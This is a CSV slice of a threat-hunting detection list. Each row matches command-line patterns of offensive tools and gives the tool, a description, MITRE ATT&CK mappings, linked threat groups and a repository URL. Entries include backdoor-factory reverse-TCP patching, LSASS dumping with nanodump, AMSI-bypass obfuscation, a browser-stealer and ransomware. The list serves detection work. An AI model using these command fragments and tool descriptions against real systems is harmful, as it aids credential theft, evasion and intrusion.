"* -f shells/generic1.ps1 *",".{0,1000}\s\-f\sshells\/generic1\.ps1\s.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","1177"
"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*",".{0,1000}\s\-f\stcpview\.exe\s\-s\siat_reverse_tcp_inline\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-m\sautomatic\s\-C.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1178"
"* -f TeamViewer.exe -H * -P * -s *",".{0,1000}\s\-f\sTeamViewer\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\s.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1179"
"* fake small keys before real ones""*",".{0,1000}\sfake\ssmall\skeys\sbefore\sreal\sones\"".{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","1180"
"* --fakealias www.fake.com*",".{0,1000}\s\-\-fakealias\swww\.fake\.com.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1181"
"* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","1182"
"* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","1183"
"* -FakeDC * -SamAccountName * -Username *",".{0,1000}\s\-FakeDC\s.{0,1000}\s\-SamAccountName\s.{0,1000}\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1184"
"* --fakedomains *",".{0,1000}\s\-\-fakedomains\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1185"
"* -fake-hostname *",".{0,1000}\s\-fake\-hostname\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","1186"
"* --fakeip *",".{0,1000}\s\-\-fakeip\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1187"
"* --fakeipv6 *",".{0,1000}\s\-\-fakeipv6\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1188"
"* --fakemail *",".{0,1000}\s\-\-fakemail\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1189"
"* fcrdns.nse*",".{0,1000}\sfcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1190"
"* fenty.py*",".{0,1000}\sfenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","1191"
"* --file ownedusers.txt*",".{0,1000}\s\-\-file\sownedusers\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1192"
"* file://catspin.yaml *",".{0,1000}\sfile\:\/\/catspin\.yaml\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","1193"
"* --file-smuggler-port *",".{0,1000}\s\-\-file\-smuggler\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","1194"
"* filetransfer -download -src-file *.exe*/tmp*",".{0,1000}\sfiletransfer\s\-download\s\-src\-file\s.{0,1000}\.exe.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1195"
"* filetransfer -upload -src-file *.exe*\temp*",".{0,1000}\sfiletransfer\s\-upload\s\-src\-file\s.{0,1000}\.exe.{0,1000}\\temp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1196"
"* FileZillaPwd*",".{0,1000}\sFileZillaPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1197"
"* finger.nse*",".{0,1000}\sfinger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1198"
"* fingerprint-strings.nse*",".{0,1000}\sfingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1199"
"* firewalk.nse*",".{0,1000}\sfirewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1200"
"* firewall-bypass.nse*",".{0,1000}\sfirewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1201"
"* flash.bat*",".{0,1000}\sflash\.bat.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","1202"
"* -fluctuate=NA -sleep=*",".{0,1000}\s\-fluctuate\=NA\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1203"
"* -fluctuate=RW -sleep=*",".{0,1000}\s\-fluctuate\=RW\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1204"
"* flume-master-info.nse*",".{0,1000}\sflume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1205"
"* --flush-attacks*",".{0,1000}\s\-\-flush\-attacks.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","1206"
"* follina.py *",".{0,1000}\sfollina\.py\s.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","1207"
"* follow_attacker_commands.py*",".{0,1000}\sfollow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","1208"
"* -force-forwardable",".{0,1000}\s\-force\-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1209"
"* --force-kerb *",".{0,1000}\s\-\-force\-kerb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1210"
"* --force-ps32",".{0,1000}\s\-\-force\-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1211"
"* -forceshadowcred *",".{0,1000}\s\-forceshadowcred\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","1212"
"* --ForceShadowCred*",".{0,1000}\s\-\-ForceShadowCred.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","1213"
"* Forensia.exe*",".{0,1000}\sForensia\.exe.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","1214"
"* Forensike.ps1*",".{0,1000}\sForensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","1215"
"* forgeTGT(*",".{0,1000}\sforgeTGT\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","1216"
"* --fork --write *.dmp*",".{0,1000}\s\-\-fork\s\-\-write\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","1217"
"* ForkDump.cpp*",".{0,1000}\sForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","1218"
